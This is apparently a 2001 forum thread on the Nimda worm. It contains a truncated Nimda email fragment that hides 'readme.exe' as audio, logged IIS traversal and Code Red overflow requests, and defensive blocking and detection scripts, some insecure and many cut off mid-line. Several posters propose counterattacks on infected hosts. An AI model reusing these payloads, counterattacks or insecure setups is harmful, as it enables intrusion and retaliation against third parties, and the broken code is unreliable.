Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAA
[the remainder of the message is base64 encoded, also please note that some of the characters in the Subject line are unprintable and were replaced with '.' when pasted]
I was alerted to the problem by a dialog box that quickly disappeared, and a lot of extra hard drive activity. I crash-booted my box, and when it came back up there were no extra processes or files, and the registry checked out but that DLL was corrupted.
For all intensive purposes, "whom" is no longer a word. That begs the question, "who cares"?
Hello,
/scripts/root.exe>
/usr/local/sbin/iptables
Tuesday, September 18, 2001, 11:51:43 AM, you wrote:
JM> Yes. We are seeing it here bigtime. Does anyone have any apache hacks
JM> to lessen the impact? One idea: Once a probe is sent, the prober's
JM> IP# is stored in a hash (perhaps in shared memory or a mmap'd file
JM> that all children can share) and new connections from that IP are no
JM> longer accepted.
Here's a possibility but I need help with one aspect:
A) create a rule in your apache httpd.conf like this:
<Location
Deny from all
ErrorDocument 404 http://www.everydns.net/blockip.php
</Location>
B) create blockip.php (or use perl or whatever[read: python])
<?
$iptables = '/usr/local/sbin/iptables';
$ip = $REMOTE_ADDR;
$blockline = $iptables." -A INPUT -s ".$ip." -p all -j DROP;";
system($blockline);
?>
C) the caveat here is that you need to give the webuser (nobody)
access to iptables. This can be done in sudo like this:
nobody ALL=NOBODY:
The MAJOR problem is that you have now given your entire web site
access to iptables. If you have a machine which has no "users" then
this may be okay for you however for most of us it is not. Do any of
you have a way to call a perl script directly from the httpd.conf
entry and perhaps pass the REMOTE_ADDR to it? I know there's a way
and I'll look for it, but in the meantime -- any ideas?
Thanks,
David Ulevitch
davidu@everydns.net
# Hack the planet, it's important.
We were victims of this virus as well. Only this time what happened was it used RealPlayer to keep respawning itself, causing explorer to crash repeatedly and eventually fill up virtual memory until it crashed.
This made it problematic to figure out what to do to stop this because I couldn't even do something as simple as look at my system drive. Fortunately, I was able to use Taskmanager.
If anybody runs into a problem like this, here are a some tips:
- Explorer is basically hosed using this type of attack. However, Taskmanager (set to always on top) will allow you to perform basic file operations. From Taskmanager, go to 'File/Run' and hit "Browse". When you rightclick on a file/folder you can do things like delete, rename, etc.
- In this particular case, RealPlayer was being used to cyclicly run itself over and over again, so I renamed the 'Real' folder to 'Real_', thus making Windows think the program's non-existent anymore. This was tricky because the file was sometimes in use, but I was finally able to manage it.
- I found the 'readme.eml' file on the system drive. I'm still trying to determine how it got there, but it can be prevented from entering there by creating a 'readme.eml' folder, as my coworker recommended. This will prevent a file with that name from being created in there.
- If you have trouble deleting the files that were being run, check to make sure that they're not 'System Files'. I ran into that problem.
"Derp de derp."
Just thought i'd mention that Echo Audio's site www.echoaudio.com is currently infected. I'm using the IE 5.5 (Sp2) and it asked me if i wanted to save or execute readme (1).exe, but at least it didn't just run. I called and let them know of the problem at 11:00am PST, so i don't know how long it will remain infected.
"The crows seemed to be calling his name, thought Caw."
Just hit by 205.188.140.176...hmmm, plug that into Netscape and I get www.aol.com.
Lovely...
> It's something new attacking something old. It looks to me like its trying a few of the old IIS vulnerabilities...
Suppose someone wrote a worm that, whenever it managed to root a box, would undo the patches that finally killed off the famous worms of the past, and also remove the anti-virus software's data files.
Since many of those worms/viruses are still lurking about at the level of background noise, they would suddenly find a vastly expanded niche and start attacking machines that had formerly been off limits to them.
You could get a huge pile-up of worms and viruses all "re-released" simultaneously.
Sheesh, evil *and* a jerk. -- Jade
If you're running Apache, you can do conditional logging by inserting the following in your main virtualhost:
/path/to/http_access.log combined env=!dontlog
l
SetEnvIf Request_URI "winnt" dontlog
SetEnvIf Request_URI "root.exe" dontlog
CustomLog
Of course you can set this up to be any kind of log you want, not simply "combined". And, sorry if this has been posted before, but I really don't have time to read all the posts. More info here: http://httpd.apache.org/docs/logs.html#conditiona
Maybe releaseing a virus should be considered to be on the same level with any other terrorist act.
I just talked to one of my friends at microsoft, and apparently his workstation just got infected with the new virus. Good to see that they're reaping the benefits of their own products :)
This is a really great Perl module that can help to combat the CodeRed virus and could possible even be used on Nimda:
Apache::CodeRed
Wooden armaments to battle your imaginary foes!
While symantec calls it "Nimda", McAfee refers as "Minda". It's really a powerfull polymorphic worm, it changes it's own name.
NoSig
NO! Here's what wget showed me for one host:
[message/rfc822]
So this thing is really evil:
1. it uses many forms of attack
2. it attacks server _and_ clients
3. it propagates by tftping the load from altering hosts (probably from the host which
did the attack before)
4. it alters the content type for the client infection via http+IE
The traffic being generated by all our neighboring class A blocks is saturating our T1's... our webservers are running full blast logging 404 errors.
Here's an mrtg graph of T1 bandwidth at one server pop.
People who fail to patch their systems should be sued for incompetance. Whether it be microsoft, linux or what not.
-
I'm running IE6 - when I went to a page on an infected server, IE asked me what I wanted to do with this "audio" file it thought I wanted to open then shut down (IE shut down, not anything else) when I told it NOT to open in the browser.
I think IE5.5 SP2 will do this as well - it's a MIME vulnerability that supposedly is fixed with these newer versions of IE (the vulnerability being that the file tells IE it is an audio file, but is actually executable)
I have a link to an infected index.html.
PLEASE USE THIS LINK RESPONSIBLY. If you are running MS something, you risk infection.
I've seen two variants. The first said (red letters on a black background):
fuck CHINA Government
fuck PoisonBOx
The other version said fuck USA Government.
USE LINK WITH CAUTION..it will attempt to load a script: (actually, to be on the safe side I'm just using the IP rather than a complete link:)
216.47.210.11
Evil is the money of root.
This train wreck of a worm is so virulent it's going to make CodeRed look like a tricycle tip over.
There's more to it than this.
I'm getting, with the other Windows-specific attacks, one Non-Windows specific (rather a perl/CGI specific) attack: a request for "libwww-perl/5.51".
-- @rjamestaylor on Ello
This is all well and good when it is Microsoft. But what happens when these things start hitting badly administered Linux/BSD/Solaris boxes? Will you be so quick to demand Red Hat send out CDs and pay damages? Doubtful.
Blame the admins and only the admins. I can forgive not patching something the first day, but by now? What are these people doing?
My company's server log showed a barrage from: 216.191.58.143, being that this is an IIS/NT worm I knew that address must have a web server. I plugged it into my browser and guess what it is?
Microsoft itself! Their NT option pack page nonetheless, with a few references to IIS in the page. Check it out!
Always (fr)agile, ready to (c)rumble...
Enterprise software from Microsoft.
People shape laws. Not the other way around.
I mail every single one I can get an email address for, but frankly it's a losing battle and shouldn't be my job anyway - many of these servers are living on dhcp leases from their ISP.
I think that a person who's running a rougue computer that's breaking into other people's machines should be shutdown by their ISP - and they afterall are the people who can match DHCP leases/times with email addresses/accounts.
I'd like to see ISPs take a public proactive initiative in this area
That's the default install page for NT Option Pack.
Update: 09/18 16:40 PM GMT by J:
There is no AM or PM when using a 24-hour clock, moron.
Early request patterns looked like this:
/scripts/root.exe
/c/winnt/system32/cmd.exe
/_vti_bin/..%5c../..%5c../..5c../winnt/system32/cm d.exe
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/c md.exe
/winnt/system32/cmd.exe
/scripts/..%5c../winnt/system32/cmd.exe
/scripts/..%5c../winnt/system32/cmd.exe
/scripts/..Á../winnt/system32/cmd.exe
(Params/IP Omitted)
Now I'm seeing these in some requests:
Its true... like anyone posted you can get rid of infected servers attempt to push that readme.exe to you by disabling sound in websites in ie options.
Freakone
Reprogram the worm to, instead of propogate itself once into a vulnerable server, simply shut down the server and/or machine, or better yet, simply remove/break the IP stack. I could feed it all the IPs of infected machines out of my webserver logs. Kinda cyber-Darwinism.
Just found an mmc.exe file in the WINNT directory on our infected IIS server (luckily, one of the three remaining NT machines we have left).
The modified date/time coincides exactly with the time the attack started on our server. Any attempt to delete the file shows a sharing violation/file may be in use. A quick look at the ownership shows it to be owned by the Internet Guest account. I'm attempting to remove the file now. Just an fyi to anyone who hadn't noticed this yet.
Raymond Umerley
Manager of Network Operations
Antenna Software, Inc.
rumerley@antennasoftware.com
Personally, I'd rather have better software.
That's why I try to avoid M$ as much as possible.
Yep, agreed. This thing is nasty.
do these worms follow redirects ?
:)
I set up a redirect-to-the-microsoft-page in my httpd.conf for CodeRed-attacks - I really hope these worms follow the 302 and hit
microsoft.com
The biggest problem, presumably, is the fact that it's chewing up your network bandwidth. Adding ipchains rules will cause your machine to ignore the packets, but they're still consuming time on your DSL/cable/whatever link.
What we really need is for ISP's to take a slightly more aggressive (but directed) approach.
my friend got it on his laptop and then had some weird things happen with someone trying to get his ebay account password.
as far as I know, this thing isn't malicious beyond replicating itself and breaking into your box - annoying - but it doesn't screw up data files, or download your porn to some central server...
There are some odd things afoot now, in the Villa Straylight.
Apache needs an Code red worm blocker or something so we dont have to put up with 20 megs of logs for it.
Whoo hoo My entire Dedicated companies sub domain is affected
:)
I got sick of seeing the logs, so just blackhole on the first request (for me, it's /MSADC/root.exe):
/MSADC/ "@@ServerRoot@@/cgi-bin/"
v [1],"dev","lo",NULL);
/sbin/blackhole blackhole.c
/sbin/blackhole
/sbin/blackhole
in httpd.conf
ScriptAlias
root.c:
#include
int main()
{
char *addr;
printf("Content-type: text/html%c%c",10,10);
printf("You have a virus, dumb-ass\n");
addr = (char *)getenv("REMOTE_ADDR");
if (addr != NULL) {
fflush(stdout);
close(stdout);
close(stdin);
execl("/sbin/blackhole","blackhole",addr,NULL);
}
}
blackhole.c
#include
int main(int argc, char *argv[])
{
if (argc > 1 ) {
execl("/sbin/route","blackhole","add","-host",arg
}
}
then
gcc -o
chown root
chmod 4755
gcc -o @@ServerRoot@@/cgi-bin/root.exe root.c
replace @@ServerRoot@@ with your server root dir ofcourse...
If you look in the files, there are clearly defined string values that show some of the attacked directories. It's not much, but maybe it'll help someone else figure out how to stop the worm.
http://www.smu.edu/~laguerra/readme.asm.rar (ASM)
http://www.smu.edu/~laguerra/readme.rec.rar (C from REC)
-GamerDFWM
I just checked back through my logs, and found about a dozen hits from a single IP on September 10th. It tried to get cmd.exe, root.exe, NULL.ida, index.asp, and index.php.Anyone with more experience than me know what that's all about?
Evil is the money of root.
According to Computer Associates it's just a variant of the original CodeRed, CodeRedv3. They've got all the info on it listed here. It matches the hits I'm getting on my site, I don't know about everybody else.
That's it! i'm sick of all these worms trying to get cmd.exe when i'm running linux! I'm gonna collect their IPs and flood them with requests for /etc/passwd!!!! If you want to contribute IPs or bandwidth, join the Passwd Flood Network (PFN)!! :)
They that quote Benjamin Franklin on liberty and safety deserve neither.
Nah, I personaly believe that the correct action is to start writing our government officials complaining of the increased cost of operation of non-MS based ISPs due to the negligincy of MS in patching and writing thier software. I would even go so far as to imply criminal negligence.
This exemplifies one of the many reasons MS needs to be monitored closely and punished.
What? me have a sig? don't be ridiculous.
Please don't flame me if I'm way off base - I'm not very familiar with the way Google caches sites - but might it have cached your pr0n images? Could you just run a search for your site on googl, then access the cached version?
I'm the stranger...posting to
I've got an end-luser who claims that, when she opened up the email attachement she received (bad luser, bad!), it brought up an image of the statue of liberty flipping off the viewer.
Granted, I haven't felt like offering up a system for sacrifice to verify, but it goes well with the earlier comment that things linked back to a pro-WTC 2600 site...
-- Niherlas
Microsoft Software is more popular and so it gets hit more. If linux was just as popular you would see the same thing happen.
People that dislike windows and love linux are the reason for this attack. Its these people that are writing the viruses and worms.
It just shows how linux fanatics arn't that much differnt than Mulsim fanatics.
NIMDA is getting mentioned on the FBI briefing.. Ascroft is talking about it like it's a major security hazard.
cool!
"Yes.. no matter what the culture, folk dancing is stupid." -MST3K
http://www.rainfinity.com/scripting_fix.jpg
the new macafee datfiles also successfuly fix it (we tested, their first one didn't work!)
While it is possible to write destructive code in Java, you would lack a good delivery system. Just try writing to the hard drive from an applet. Oops. SecurityException.
Java is actually well designed and suited as internet enabled binary code. The security model is just one of the ways that it accomplishes that goal.
Javascript + Nintendo DSi = DSiCade
My firewall has blocked 144 attempts in the last one and a half hour but they are all from 159.xxx
A quick search on my hard drive revealed a readme.eml file in my Temporary Internet Files folder, so I assume I am infected. How do I rid my computer of the worm?
-- It's better to be pissed off than pissed on.
I've seen so many "patriotic" emails lately that it's obvious that the social engineering situation is ripe for the plucking.
-- Geof F. Morris
No, it's a floor wax! No, it's a dessert topping!
Miko O'Sullivan
This virus isn't affecting just IIS servers.. it's being spread by all Windows computers.
This is correct, really. After a machine either: a) visits a webserver that's been infected or b) reads an email that was infected it then becomes an infection vector it's self. No, there's no admin.dll - that's only on NT/2K servers, not user workstations.
(Though, someone may correct me if I'm wrong ;-)
Davis Ray Sickmon, Jr - looking for something to read? Check out my three free novels at MidnightRyder.org
...that your computer came in. Put all the parts in the box and return it to your vendor with a note reading "I'm too stupid to be allowed to have this"
They were negligent when they created software and technologies that are so easily exploited.
.sig here - "Frustrated? Don't throw your computers out the window, throw the windows out of your computer!"
This isn't a microsoft abuse. I can go down the street to bob's lawn care and get materials to create a car bomb. Does that mean that Scott's Turf Builder is responsible for my actions? Microsoft creates a product (outlook) that checks email. It checks email, and fairly well, and in a way that is easy to understand and simple to use.
This is simple applied economics, supply and demand. There are more windows users out there than anything else, by alot. And the average windows user does not know as much about how their computer works as the average *nix user, again, by a lot. To bring the supply and demand into it, it is easier to write code for windows, there are far more windows boxen, and the users know less about the inner workings - therefore more time is spent by hackers/scriptkiddies learning exploits and writing viruses. If linux was the world's premier operating system, and my mother used KMail or Pine, i'm sure the k|dd|3z would be writing exploits for that.
Now, i don't pretend to say that Microsoft makes a superior product. It is definately less secure. However, there's a world of difference between a windows user who may, sometime in the lifespan of his computer, go to www.windowsupdate.com and download patches, and Bruce Perens using apt-get update on a daily basis. You can't reasonably hold microsoft responsible for the upkeep and mantinence of literally millions of desktop computers in the united states alone. Nor can you fault them for releasing a product that is not "hack-proof", as, to my knowledge, no such product exists.
To listen to CNN and some of the posts by the slashdot crowd, you would think that Microsoft created Windows solely for the purpose of propagating the Code Red Worm. Let's not forget the simple fact that somewhere, someone wrote that bug, and they wrote it for the platform that would allow it to do the most damage, and that platform is windows.
Now, if you're gonna criticize microsoft, put your money where your mouth is, and write your own operating system, and get it on the desktop of 97% of the computer users in the united states, and have it impervious to viruses. Or be logical, and talk to people about linux. Educate them that there's something better out there, more secure, crashes less. Put debian on your mom's box, teach her Opera. Use the line i saw on someone's
Less bitching, more solutions.
~z
sig?
Put an Big security warning when you install IIS saying this services is an webserver and as such can be comprismised DO NOT RUN IT UNLESS YOU know what you are doing.
Ok, i've got servers that are getting hit thousands of times by the same ip's. i've been probed 2500 times in the past couple of days by one in particular.
I've contacted my network colo persons, and they have "opened a trouble ticket" and contacted their admins about the problem...
nothing.
i have been increasingly leaning towards using the wonderful perl script found on DasBistro that someone already posted. i'm thinking of writing a php version (shouldn't be too hard...)
BUT
if i shut down some machine that is pounding on my server are there really legal ramifications? i've seen some posts claiming so, but i haven't seen a consensus.
I'm also contemplating writing a reverse virus that will worm into a codered/nimda/whatever infected box and apply patches etc... but not spread itself further to avoid creating network problems.
any ramifications of that?
anybody?
i hate to have to resort to that but i've been probed 3000 times in the past 5 minutes!!!!!
This has got to stop!!!
get your dirty sig off me, you filthy APE!
anyone got this?
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271
213.80.2.98 - - [18/Sep/2001:21:12:21 +0200] "GET
Some of the people over here are experiancing "Out of memory" messages even though resources show 70%+.. Cant send email or open excel files amung other things.
.eml's are created in any shared paths but when deleted they just reappear upon reboot.
sigh..
all my boxes on 208 block, lovely SWBELL, many BabyBell DSLs are on this 208. Worm used Admin W3SVC to expose /%root%/system32/cmd.exe, and other dll's asundry. Has launched a VB macro for Outlook Express in addition. OE compose windows were flying up all over the screen. Explorer.exe shell finally crapped out. with no interface, I did the ol Ctrl+Alt+Del, TaskMon, File/Run, cmd.exe, then I cd /~progra~1/outloo~1. renamed every file in there to another name. rebooted. Seems to have stopped the flurry of emails. Called MS, they had no idea this was going on. gave them "Nimba". boywonder wrote it down on peice of paper, went to his super. Came back in 5, said Security Department is on it, look to ms.com/security for updates (HA! nothing yet. f-secure has more info!). still waiting for zippy the wonderslug to react. why! why Lord did we choose microsoft! forgive us our sins as we were fools sucked in back in 92 to billephesto's clutches! anyway, this does not fix the reg mods. have hope...
I am finding the following line in all of my html docs and some .exe on the affected servers:
'window.open("readme.eml", null, "resizable=no,top=6000,left=6000")'
Nothing is impossible. It just hasn't been figured out yet.
Whether or not it's an actual "act of war" is irrelevant right now - the US gov't is just twitchy enough (and rightly so) at the moment that it would *perceive* this as an act of war and act accordingly against whomever authored the virus.
All in all, this could not have been released at a worse time.
So you can explicitly deny execute access to TFTP to the IUSR_computername account.
Trolls throughout history:
Jonathan Swift
Miko O'Sullivan
OpenSourceLobby.org
Miko O'Sullivan
Our whole network is being severely bombarded, amazing...
Take a look at the traffic on one of our T1 lines click here
The downward spike is when our network admin shut everything out for a while as he attempted to reconfigure our router and firewall to stop the attacks...
Nathaniel P. Wilkerson
www.haidacarver.com
Here's some quickie detection methods.
y MD Ax
grep for "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"
or a perl script to do the same:
#!/usr/bin/perl
$SIG = <<EOF;
436f 6e63
6570 7420 5669 7275 7328 4356 2920 562e
352c 2043 6f70 7972 6967 6874 2843 2932
3030 3120 2052 2e50 2e43 6869 6e61 0000
EOF
$SIG =~ s/\s//g;
$SIG =~ s/([\dabcdef]{2})/chr(hex($1))/ge;
while () {
if (index($_,$SIG)>=0) {
print STDERR "W32/Nimada.A\@MM DETECTED!\n";
exit 128;
}
}
MIME Encoded the Signature is:
Q29uY2VwdCBWaXJ1cyhDVikgVi41LCBDb3B5cmlnaHQoQyk
(make sure you remove the space at the end between MD and Ax. Slashdot adds it to prevent long strings from breaking formatting)
Heh, more like:
Troll or flamebait - any comment on Slashdot that is less than wildly enthusiastic about any Microsoft-related product, or is even remotely supportive of non-Microsoft software of any kind.
Your post raises a good point. These ISPs are paying for this traffic that's being caused by faults in Microsoft's products. Why shouldn't Microsoft be held accountable for these costs? If we cause any dip in the revenue of Microsoft's products, or any cost to them, we're accountable. Why shouldn't they be?
If you're like me and (unfortunately) stuck in an Exchange/Outlook mail environment, and you're ready to drop-kick your salespeople for opening README.EXE because they 'thought it would be important', you can significantly save yourself some headaches. Here's what I did:
1) Got everyone using Outlook as an Exchange client to at least Outlook 2000 SR1. This keeps Outlook from being able to even receive 'Level 1' attachments (EXE, COM, BAT, VBS, etc). Get the update here.
2) I work for a software company, so our developers email around these types of files all the time. So I got the Outlook Email Security Update Administration Tools here. It allows you to customize what attachments get through your server and which don't, to which users, etc.
Keep those attachments out of the hands of your more careless users, and make Exchange (gasp) useful instead of painful.
Just something I found useful.
---
"how can the same street intersect with itself? i must be at the nexus of the universe!" - cosmo kramer
Seeing as it's known how these worms spread (such as Code Red, etc.), and you know that the computers that are connecting to yours ARE infected, couldn't you use the known exploit to hack their IIS service?
.ida file access) that if the buffer overflow contained random data, it would shut down the IIS service (IIS 5.0 will auto restart though). Seeing as it's the IIS service that's running the rogue virus, wouldn't this stop the threat, at least temporarily? (Or, does is the .ida file exploit used to load a larger virus that runs standalone?).
Microsoft says in their documentation on the Code Red exploit (through the
It'd be simple to create a file with the name that the virus tries to GET (and enable Apache to execute that extension). This script would then send a GET request exactly like Code Red to the affected server, with random data in the overflow area. (about 2 lines of Perl).
The IIS service should then shut down, and if it's version 5.0 or later it will restart (possibly clean).
Comments?
MadCow.
I used to have a sig, but I set it free and it never came back.
Microsoft's published a handy-dandy GUI tool that will eliminate most of these types of worms. Go here
l easeID=32362
http://www.microsoft.com/Downloads/Release.asp?Re
"BSD is about people pissing each other.." (Moid Vallat)
...Juliene fries!
"There is no reason anyone would want a computer in their home." -- Ken Olson, 1977
A book could have been written on "Lessons learned by Code Red", but it wasn't, so here are some really random thoughts:
Network design:
The new, but simple attack strategy, of hitting neighbour IP adresses, should be a wake up call for all, since this allow for very rapid infections of LAN
Correct me if I am wrong, but wouldn't it be fair to say, that for Code Red to infect the LAN side, the network (and firewall) is fundamentally designed
wrong? Why should a webserver on the public internet, be allowed to issue GETs through the firewall, to the LAN side?
Eg. a company has a public webserver (host A), and a LAN-side server (host B). Of course they have setup their firewall, so that host B, can't be reached directly from the Internet. But for some reason, (people are often cited for, that it is convinience), they make it possibly for all kind of traffic to reach host B, as long as it originates from host A.
Patching:
People often say; "Just patch, and you will be safe". But patching is just the first line of defence.
Some day, a Code Red style worm, exploiting an unknown flaw, perhaps even a flaw that are not easely patched like a "standard" buffer overflow. The speed of such an infection could be overwhelming, with perhaps 100.000's of hosts infected per day, and worse, since the infect algorithm, seems to be very effective in getting inside LANs, the problem may reach infocalyptic proportions.
My point is, that a secure network _design_ with defence in depth, is a necessity, and may stop the infection on the Internet-side.
Perhaps "network plurality" may be something; eg. if one is running MS web-servers, then deploy a Linux/*BSD firewall.
Finally, the LAN side seems very vulnerably now. Sysadmins now face, the overwhelming, Sissyfosian task of patching, upgrading, and locking the LAN-side, as tight as if it were on the public Internet. That just won't happend.
Futher ranting on patching; Why does (some) vendors mix security fixes, and non-security, non-critical bug-fixes, and, worst of all "enhancements" in the same patch? (are you listening MS ).
No wonder SysAdmins are hesitant to patch LAN side, produktion servers when the patch is more than 50Mbyte.
They must wonder whether their systems may BSOD on the spot. (How many times was MS-SP 6 pulled, before it reemerged as SP 6a, twice?). Or does all the new "enhancements" or bugfixes break "company-wide-important-app"?
And speaking of "defence in depth"
Not many networks seems to secured that way, or monitored at all by eg. IDS's. Yeah, money seemed to be spend on "surf-blocking", or monitoring employees mail for four letter words, and badmouthing of the boss.
From my reading of usenet and weblogs on Code Red, it seems that most people discovered it, since their MS-NT 4.0 servers crashed more than usual, or that their managed switches, and IP-printers locked up.
I am no better than the most, I am still reading up on Tripwire and Snort.
NAT
I like NAT
But NAT gives rather less protection, if portforwarding is used; eg. small company buys a xDSL connection, and are issued small router that does firewalling and NAT. So they make portforwarding to p:80, and closes everything else. But Code Red style worms just thrive on such a setup; It is handily portforwarded into the LAN side, and will spread real fast once inside.
And NAT and firewalling doesn't help at all, if the worm is multi-vectoring through mail and webbrowsers:
eg. the first infections is by mail. The trojan then watches were people surf, and tries to infect those sites.
If succesfull, the trojanend machine, deploys a payload on the website, that further infects all vulnerable webbrowser, visting the site.
On infected machines.
Every attacking machine are announcing to the world that it is infected. (A clever, fellow slashdotter
wrote a piece on this, but I can't find the link now)
Further, more malicious attacks may be instigated on the affected machines. And these, second wave-attacks may not appear in any logs, they may even be impossible for any IDS to detect.
And speaking of IDS's; how many actually monitors traffic going out from the network, especially through port 80?
People may have gotten by, by just removing the actual trojan until now. Perhaps this time too, but
next time it is likely, that all the script kiddies in the world seizes the opportunity to mass infect the infected machines with new and improved root-kits.
Imagine a DDoS from a skript kiddie, controlling 50.000 machines residing all around the globe. Good luck filtering that out on the router, or even your upstream providers router.
Or even worse, a skript kiddie with a clue, a personal grudge against your company, and having a root-kit on your LAN.
And more; it seems like a lot of Code Red attack machines, were W2k Pro's with accidentaly installed web-servers.
Now, the fools with upatched boxes and xDSL lines are hard to do anything about, but it also seems that a lot of accidently web-servers, were found on company
VPN's:
VPNs are often labelled as something that enhances security, but as other point out, they are actually the exact opposite, since they dig a deep hole in the firewall, into the corperate LAN. Good cryptation and authentification by VPN's, doesn't help, if Mr. Traveling Salesman are trojaing a worm, when he connects the LAN through his laptop.
In short, we must all rethink our network design and security. Firewall and IDS on the inside LAN. Lock and patch the LAN, as it was on the public Internet. Use eg. "port mirroring" on the core switch to a "silent" monitor box.
Run network scanners like nessus (www.nessus.org) and nmap on all LAN clients and hosts, so "forgotten" machines are discovered, and accidently installed web-servers are discovered.
Harden hosts with tripwire
Edit this to suit
/.*\/winnt\/system32\/.*/) {
/$dupe/){
#!/usr/bin/perl
# IISBLOCK - Infected IIS server blocking utility.
# by Bill Larson of Compu-Net Enterprises.
# http://www.compu.net. This header must be kept intact if you
# wish to redistribute the script.
my $check = 0;
my $line = "";
my $weblog = "/etc/www/logs/access_log";
my $infection = "/root/infected";
my $removelist = "/root/fwclean";
#open the web server log file specified above and start processing
open (HTFILE, "$weblog");
until (eof (HTFILE))
{
$line =;
chop ($line);
#Pattern match on IIS Attempts then strip down to the hostname/ip addresss
if ($line =~
$line =~ s/\ -.*//gi;
# This host is infected so lets do something about it.
}
}
close(HTFILE);
sub infected {
$check = 0;
# begin a check to ensure that we only take action once.
open (HTFILE2, "$infection");
until (eof (HTFILE2)){
$dupe =;
chop ($dupe);
if ($line =~
$check = 1;
}
else {
}
}
close(HTFILE2);
# If this is a unique host continue
if ($check eq "0") {
# time to add to the list of infected hosts
open (HTFILE2, ">>$infection");
print HTFILE2 "$line\n";
close(HTFILE2);
# add using the specified add command
# firewall software will print an error on invalid hostnames.
# Zap them one at a time maunally
system ("/sbin/ipchains -I input -s $line -j DENY -l");
# write firewall removal line to the remove list file
# modify this line for your specific firewall software
open (HTFILE3, ">>$removelist");
print HTFILE3 "/sbin/ipchains -D input -s $line -j DENY -l\n";
close(HTFILE3);
}
# That's all folks!
}
"GET / HTTP/1.0" 200 51230 "-" "Mozilla/4.0 (compatible; Setec Astronomy)"
Now would be the perfect time to upgrade to Microsoft's new state of the art operating system 'Windows XP'. I'm sure once everyone does this sort of thing will never happen again!
*smirk*
I have a cable modem in the 24.x.x.x range and I haven't seen anything out of the ordinary in my logs all day. heh... It's amazing what a properly configured firewall can do to keep your system secure.
<humor>
Heck, no virus has ever been able to get into my comp. Why, my comp hasn't even crashed once since I g
- ERROR: Connection to host lost.
</humor>We're going to make information free Mr. Anderson, whether you like it, or not.
Okay, I've modified my system for trapping Code Red attacks to log Nimda attacks as well. So, do y'all reckon SecurityFocus wants to know about it as well?
Oh, go on, check out my job.
Sort of, but I still agree. *BUT*, which would you choose if you wanted something that simply "ships" secure?
BSD.
(Yeah, it's a troll. But try any version of BSD for a while and you'll realize how sloppy Linux really is.)
--saint
These attacks are becoming annoying, it seems that any jerk can set up a web page with Microsoft IIS and make those of us how take the time to learn about worms/viruses and setting up systems properly suffer by their incompetence or ignorance.
I'm not only getting scanned by home PC's, but sites which look like they are 'real' web providers, i.e. people who should know better by now.
Is there anything that sensible users can do to slow/stall/crash the offenders computers in order to reclaim the bandwidth that they are wasting?
Most annoyed,
Simon W.
psxndc
The emacs religion: to be saved, control excess.
Calling it Nimda seems to say it's the ADMIN(nimda reversed) that are backwards. For many of them it's not their fault they are getting hit with this. It's Microsoft that's backwards on security.
I used to be a fan of MS. I am now planning ways to leave them behind at home and for the organization.
There should be some way to filter out access based on OS. That would be good, cause it always seems to be NT/2000 boxes screwing up the network, speaking of which, I seem to have an 2000 box with Active directory trying to send updates to my domain cause some idiot admin deceided to put my domain name in their machine. Prob. some 15yr old kid who doesn't have the first clue about routing and DNS.
.. do we really need all these Idiot boxes on the Net?? I say we all upgrade to IPV6 and leave the MS boxes on their own IPv4 network wallowing in massive packet spray.
Great
I don't think that the time this new virus was released was an accident. Since a virus like Nimda probably took more than a week to write, it may have been written by someone connected to bin Laden. Also, it may have been written many weeks or months ago, but not released until today.
So if the person who wrote/released this "Nimda" is reading this, I just have to say that you'll have to try harder because my Linux box running Apache has held up through Code Red, and is holding up extremely well with Nimda. The only problems it causes me is filling up my log files.
"the fax machine is nothing but a waffle iron with a phone attached to it." - Grandpa Simpson
I can go down the street to bob's lawn care and get materials to create a car bomb. Does that mean that Scott's Turf Builder is responsible for my actions?
In addition to that being an extremely tasteless analogy in light of recent events, it's not even a remotely fair one. In the case of IIS, Microsoft claimed that it was secure. In the case of their e-mail client (Outlook/Outlook Express), who in their right mind would write an e-mail client that executed code (vbscript, etc.) enclosed in an e-mail?
You can't reasonably hold microsoft responsible for the upkeep and mantinence of literally millions of desktop computers in the united states alone.
That would be like Ford/Firestone having to recall tens of thousands of tires just because they fall apart and cause accidents. Should drivers of Ford SUVs go to www.ford.com to check for recalls every day? Maybe in your world...
Now, if you're gonna criticize microsoft, put your money where your mouth is, and write your own operating system, and get it on the desktop of 97% of the computer users in the united states, and have it impervious to viruses.
That's the most ridiculous thing I've read in a while. So you are actually saying that I don't have a right to complain about an unsafe car unless I start my own competing car factory? Parents cannot complain about strollers that injure their kids unless they start a stroller company? People deformed by Thalidimide have no right to complain until they start their own pharmaceutical company and make a competing drug? How many moons circle your home world?
Or be logical, and talk to people about linux. Educate them that there's something better out there, more secure, crashes less.
Damn! All I had to do was talk to 25,000+ Road Runner users throughout the country, convince them to switch to Linux, and I could have avoided my connection being hammered for two weeks? Now you tell me. I'll put all of my belongings into an RV so that I can tour the country convincing people to switch to Linux.
Less bitching, more solutions.
Solution: AOL, Earthlink, UUNet, and every other major ISP in the world join together, sues Microsoft, and wins a large settlement. Microsoft stops developing and bundling bad video editors, paint packages, web servers, and online Othello games and, instead, concentrates on making a more secure, robust OS.
Fed up of letting other people create chaos, I've just knocked together a Java app to sit on port 80 and wait for HTTP requests.
:) Loadsa fun.
When it gets one, it spawns a thread to open a client socket onto port 80 of the original incoming machine and send back the original request
